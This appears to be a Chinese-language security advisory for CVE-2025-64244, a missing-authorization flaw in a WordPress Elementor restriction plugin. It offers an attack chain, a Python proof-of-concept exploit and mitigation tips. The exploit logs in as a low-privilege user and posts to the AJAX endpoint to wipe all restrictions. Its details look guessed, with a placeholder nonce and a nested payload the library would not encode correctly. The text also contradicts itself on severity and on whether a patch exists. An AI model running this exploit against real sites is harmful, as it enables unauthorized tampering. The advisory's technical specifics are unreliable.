CVE-2025-64244 WordPress Restrict Elementor Widgets插件访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-64244

漏洞类型

缺少授权/访问控制

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Restrict Elementor Widgets, Columns and Sections (WordPress插件 by Codexpert, Inc)

漏洞概述

CVE-2025-64244是WordPress插件Restrict Elementor Widgets, Columns and Sections中的一个严重访问控制漏洞。该漏洞属于Missing Authorization类型，由于插件在处理用户请求时未能正确实施权限检查，导致低权限用户（如订阅者角色）可以执行本应仅限管理员或高级用户操作的敏感功能。攻击者利用此漏洞可以绕过正常的访问控制机制，对网站内容进行未授权的访问和修改，包括限制或解除Elementor页面构建器的widgets、列和部分的访问权限。该漏洞影响版本从插件初始版本到1.12版本，CVSS评分为4.3（中危），攻击复杂度低，无需用户交互即可实施攻击。

技术细节

该漏洞源于Restrict Elementor Widgets插件在关键操作端点缺少权限验证检查。攻击者可以通过构造特定的HTTP请求，直接访问原本需要管理员权限才能调用的AJAX端点或REST API接口。由于插件未正确使用WordPress的current_user_can()或wp_verify_nonce()等安全函数进行权限校验，低权限认证用户可以绕过访问控制直接执行受限操作。攻击者通常需要先注册一个低权限账户（如订阅者角色），然后利用该账户发送包含目标操作指令的请求，如添加、修改或删除Elementor组件的访问限制规则。此漏洞允许攻击者修改网站的页面构建器配置，可能导致内容泄露或网站功能异常。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标WordPress网站并确认安装了Restrict Elementor Widgets插件（版本<=1.12）

STEP 2

2

初始访问：攻击者注册一个低权限账户（如订阅者角色）或利用现有低权限账户登录WordPress

STEP 3

3

漏洞探测：攻击者分析插件的AJAX端点和REST API接口，识别缺少current_user_can()权限检查的函数

STEP 4

4

利用构造：攻击者构造恶意HTTP请求，直接调用管理员级别的操作端点

STEP 5

5

权限绕过：服务器因缺少权限验证而执行请求中的操作，攻击者成功修改Elementor组件的访问限制配置

STEP 6

6

影响扩大：攻击者可以进一步利用修改后的配置进行内容篡改、数据泄露或服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64244 PoC - Missing Authorization in Restrict Elementor Widgets Plugin
# Target: WordPress site with vulnerable Restrict Elementor Widgets plugin (<= 1.12)

def exploit_cve_2025_64244(target_url, username, password):
    """
    Exploit missing authorization vulnerability in Restrict Elementor Widgets plugin.
    This PoC demonstrates how a low-privileged user can modify access control settings.
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url,
        'testcookie': '1'
    }
    
    session.post(login_url, data=login_data)
    
    # Step 2: Exploit missing authorization by sending unauthorized request
    # Target the plugin's AJAX endpoint that lacks proper capability checks
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Example payload - modify Elementor widget restrictions
    exploit_data = {
        'action': 'restrict_elementor_save_settings',
        'security_nonce': '0000',  # Nonce may not be properly validated
        'settings': {
            'restricted_widgets': [],  # Remove all restrictions
            'restricted_columns': [],
            'restricted_sections': []
        }
    }
    
    response = session.post(exploit_url, data=exploit_data)
    
    if response.status_code == 200 and 'success' in response.text:
        print("[+] Exploitation successful - Access control bypassed!")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print("[-] Exploitation failed or target not vulnerable")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_cve_2025_64244(target, user, pwd)

影响范围

Restrict Elementor Widgets, Columns and Sections <= 1.12 (所有版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 暂时禁用或删除Restrict Elementor Widgets插件；2) 使用WordPress防火墙插件限制可疑的AJAX请求；3) 限制用户注册功能，防止攻击者创建低权限账户；4) 监控wp-admin目录的异常访问日志；5) 实施IP白名单策略限制管理后台访问。建议尽快升级到插件的最新修复版本。